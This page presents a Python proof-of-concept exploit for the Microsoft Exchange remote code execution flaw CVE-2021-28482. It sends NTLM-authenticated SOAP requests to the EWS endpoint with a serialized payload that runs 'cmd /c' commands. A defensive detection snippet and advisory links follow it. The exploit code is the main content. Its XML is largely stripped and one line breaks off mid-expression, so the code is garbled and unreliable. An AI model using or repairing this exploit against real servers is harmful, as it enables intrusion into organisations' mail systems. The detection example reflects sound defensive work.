# Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-28482)

Affected versions

* Microsoft Exchange Server versions:
  * 2013
  * 2016
  * 2019

PoC.py:

```py
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

target = ""
username = "john"
pwd = ""
cmd = "mspaint.exe"

# XML-escape a string before it is embedded in the SOAP request body
def escape(_str):
    _str = _str.replace("&", "&amp;")
    _str = _str.replace("<", "&lt;")
    _str = _str.replace(">", "&gt;")
    _str = _str.replace("\"", "&quot;")
    return _str

payload2 = """


ahihi




asdasdasdasdasd





<__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/>


Start

cmd
/c %s









Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35
Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters


""" % escape(
    cmd)
payload2 = escape(payload2)
payload1 = """













Dlt/1
P0DT2H0M0.0S
4
Sunday
1


Std
P0DT2H0M0.0S
10
Sunday
-1




Dlt/2007
P0DT2H0M0.0S
3
Sunday
2


Std
P0DT2H0M0.0S
11
Sunday
1





0


1
2007-01-01T08:00:00.000Z









Weekly Update Meeting


%s

Come hear about how the Organized Observational Paradigm SkyNet project is coming along!
30
2021-04-22T06:45:32.868-08:00
2021-04-22T06:55:32.868-08:00
Contoso Main Gallery



Administrator@evil.corp




john@evil.corp




mart@evil.corp





1


2021-04-22T06:45:32.868-08:00
2







""" % payload2

# First request: authenticated (NTLM) POST to the EWS endpoint
res = requests.post("https://%s/ews/Exchange.asmx" % target,
                    data=payload1,
                    headers={
                        "Content-type": "text/xml; charset=utf-8",
                    },
                    verify=False,
                    auth=HttpNtlmAuth('%s' % (username), pwd))

if res.status_code != 200:
    print("error 1")
    exit()
ct = res.content
item_id = ct.split('














""" % (item_id, change_key)

# Second request: sent with the item id and change key taken from the first response
res = requests.post("https://%s/ews/Exchange.asmx" % target,
                    data=req_del,
                    headers={
                        "Content-type": "text/xml; charset=utf-8",
                    },
                    verify=False,
                    auth=HttpNtlmAuth('%s' % (username), pwd))
```
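For defenders with EWS request-body capture (reverse proxy or WAF), the following added example, which is not part of the original PoC, flags bodies that carry the type name and data-contract marker visible in the script above. Because the PoC passes its inner payload through `escape()` before embedding it, the scan undoes nested entity escaping first; the function names, marker labels and both sample bodies are constructed for illustration, and the match is a heuristic rather than a complete signature.

```python
import html

# Strings taken from the PoC on this page. Matching on them is a heuristic
# (an assumption of this example), not a full signature for CVE-2021-28482.
MARKERS = {
    "poll_parameters_type": (
        "Microsoft.Exchange.Entities.DataModel.Calendaring."
        "CustomActions.ProposeOptionsMeetingPollParameters"
    ),
    "datacontract_identity": 'xmlns="http://schemas.datacontract.org/2004/07/System"',
}

def decode_layers(body, max_rounds=3):
    """Undo nested XML entity escaping; the PoC escapes cmd, then the whole inner payload."""
    for _ in range(max_rounds):
        decoded = html.unescape(body)
        if decoded == body:
            break
        body = decoded
    return body

def scan_ews_body(body):
    """Return the sorted marker names found in one captured EWS request body."""
    text = decode_layers(body)
    return sorted(name for name, marker in MARKERS.items() if marker in text)

# Constructed samples: element names are placeholders, not real EWS schema.
BENIGN_BODY = (
    "<Envelope><Body><Subject>Weekly Update Meeting</Subject>"
    "<Location>Contoso Main Gallery</Location></Body></Envelope>"
)
SUSPICIOUS_BODY = (
    "<Envelope><Body><Value>"
    "&lt;Obj&gt;&lt;__identity i:nil=&quot;true&quot; "
    "xmlns=&quot;http://schemas.datacontract.org/2004/07/System&quot;/&gt;"
    "&lt;Type&gt;Microsoft.Exchange.Entities.DataModel.Calendaring."
    "CustomActions.ProposeOptionsMeetingPollParameters&lt;/Type&gt;&lt;/Obj&gt;"
    "</Value></Body></Envelope>"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(label, scan_ews_body(body))
```

A plain substring search for the `xmlns="..."` marker misses the escaped form, which is why the decoding pass runs before matching.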

ref:

* https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda
* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28482
